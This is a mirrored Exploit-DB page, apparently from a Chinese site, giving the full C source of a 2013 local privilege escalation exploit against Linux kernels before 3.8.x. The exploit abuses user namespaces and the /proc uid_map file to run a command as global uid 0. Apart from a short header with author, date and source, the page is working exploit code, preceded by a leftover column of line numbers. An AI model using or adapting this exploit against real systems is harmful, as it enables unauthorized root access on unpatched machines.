Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation - 体验盒子

作者： Andrew Lutomirski

日期： 2013-05-14

类别：

local

平台：

linux

来源：https://www.exploit-db.com/exploits/25450/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

/* userns_root_sploit.c by */

/* You may use, modify, and redistribute this code under the GPLv2. */

#define _GNU_SOURCE

#include <unistd.h>

#include <sched.h>

#include <sys/types.h>

#include <sys/wait.h>

#include <sys/mman.h>

#include <fcntl.h>

#include <stdio.h>

#include <string.h>

#include <err.h>

#include <linux/futex.h>

#include <errno.h>

#include <unistd.h>

#include <sys/syscall.h>

#ifndef CLONE_NEWUSER

#define CLONE_NEWUSER 0x10000000

#endif

pid_t parent;

int *ftx;

int childfn()

{

int fd;

char buf[128];

if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 &&

errno != EWOULDBLOCK)

err(1, "futex");

sprintf(buf, "/proc/%ld/uid_map", (long)parent);

fd = open(buf, O_RDWR | O_CLOEXEC);

if (fd == -1)

err(1, "open %s", buf);

if (dup2(fd, 1) != 1)

err(1, "dup2");

// Write something like "0 0 1" to stdout with elevated capabilities.

execl("./zerozeroone", "./zerozeroone");

return 0;

}

int main(int argc, char **argv)

{

int dummy, status;

pid_t child;

if (argc < 2) {

printf("usage: userns_root_sploit COMMAND ARGS...\n\n"

"This will run a command as (global) uid 0 but no capabilities.\n");

return 1;

}

ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE,

MAP_SHARED | MAP_ANONYMOUS, -1, 0);

if (ftx == MAP_FAILED)

err(1, "mmap");

parent = getpid();

if (signal(SIGCHLD, SIG_DFL) != 0)

err(1, "signal");

child = fork();

if (child == -1)

err(1, "fork");

if (child == 0)

return childfn();

*ftx = 1;

if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0)

err(1, "futex");

if (unshare(CLONE_NEWUSER) != 0)

err(1, "unshare(CLONE_NEWUSER)");

if (wait(&status) != child)

err(1, "wait");

if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)

errx(1, "child failed");

if (setresuid(0, 0, 0) != 0)

err(1, "setresuid");

execvp(argv[1], argv+1);

err(1, argv[1]);

return 0;

}